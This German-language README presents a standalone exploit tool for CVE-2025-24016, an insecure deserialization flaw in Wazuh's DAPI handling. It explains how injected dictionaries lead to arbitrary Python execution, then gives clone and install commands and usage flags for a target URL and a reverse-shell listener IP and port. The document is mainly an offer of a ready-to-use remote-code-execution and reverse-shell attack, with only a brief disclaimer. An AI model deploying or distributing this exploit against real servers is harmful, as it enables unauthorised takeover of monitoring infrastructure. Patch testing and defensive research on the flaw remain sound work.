
# Eigenständiger CLI-Exploit für Wazuhs unsichere Deserialisierungs-Schwachstelle, der Remote-Codeausführung durch das Injizieren präparierter DAPI-Wörterbücher ermöglicht, um eine Reverse Shell zu erhalten.
Eine unsichere Deserialisierungsschwachstelle in Wazuh-Servern ermöglicht die Remote-Code-Ausführung durch nicht bereinigte Wörterbuchinjektion in DAPI-Anfragen/-Antworten. Dieses Problem ergibt sich aus der Art und Weise, wie DistributedAPI-Parameter als JSON serialisiert und dann mit der Funktion as_wazuh_object in framework/wazuh/core/cluster/common.py deserialisiert werden.
Wenn ein Angreifer ein nicht bereinigtes Wörterbuch in eine DAPI-Anfrage oder -Antwort injiziert, kann er eine unbehandelte Ausnahme (__unhandled_exc__) erzeugen, die die Ausführung beliebigen Python-Codes ermöglicht.

| ❗ Haftungsausschluss |
|---|
| Dieses Projekt ist hauptsächlich als eigenständiges CLI-Tool konzipiert. Der Betrieb dieses Exploits als Dienst kann Sicherheitsrisiken darstellen. Es wird empfohlen, es mit Vorsicht und zusätzlichen Sicherheitsmaßnahmen zu verwenden. DWYOR |
git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
pip install -r requirements.txt
python3 CVE-2025-24016.py -h
Hier wird die Hilfe für das Tool angezeigt. Hier sind alle verfügbaren Schalter.
Usage:
python3 CVE-2025-24016.py [flags]
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (ex: https://<worker-server>:55000/security/user/authenticate/run_as)
-i IP, --ip IP Local host for reverse shell connection
-p PORT, --port PORT Local port for reverse shell connection